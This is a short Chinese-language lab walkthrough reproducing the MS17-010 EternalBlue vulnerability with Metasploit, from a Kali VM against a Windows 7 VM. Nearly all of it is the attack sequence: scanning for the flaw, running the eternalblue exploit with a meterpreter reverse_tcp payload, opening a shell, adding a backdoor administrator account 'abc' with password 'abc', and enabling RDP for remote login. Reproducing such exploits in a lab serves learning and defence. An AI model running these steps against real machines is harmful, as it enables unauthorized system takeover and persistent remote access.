ms17-010永恒之蓝漏洞复现
所需环境VMware,两台主机使用NAT模式连接
kali | 192.168.79.128 |
---|---|
windows7 | 192.168.79.129 |
PING命令测试主机间网络联通情况(实验必须在两者都能PING通对方的情况下进行)
当发现kali单方ping不通win7,需要先关闭win7防火墙
1.输入命令 msfconsole 进入msf框架
2.命令search ms17-010 寻找ms17-010 相关漏洞利用部分
3.命令use auxiliary/scanner/smb/smb_ms17_010对应编号,
4.show options查看配置项。
5.命令set rhosts 192.168.79.129
6.命令run 执行探测
7.命令search ms17-010 , use exploit/windows/smb/ms17_010_eternalblue 选择攻击模块并查看配置
若显示绿色说明该主机存在ms17-010漏洞
8.命令set rhosts 192.168.79.129
9.命令set payload windows/x64/meterpreter/reverse_tcp 选择payload模块并查看配置项
10.run 执行 , 查看权限 getuid,命令 shell 获得反弹shell , chcp 65501去除乱码
添加用户abc密码abc并把该用户加入用户组Administratos命令如下
net user abc abc /add
net localgroup Administrators abc /add
exit 退出win7 shell
11.命令run post/windows/manage/enable_rdp 选择后渗透辅助模块,使用该模块开启目标的3389服务
12.虚拟机需要设置允许远程桌面连接。可以用主机对虚拟机进行连接测试
帮助链接(https://blog.csdn.net/qq_35694099/article/details/80505995)
回到本地电脑,敲击win+r ,输入 mstsc,回车
输入IP地址,账户进行连接。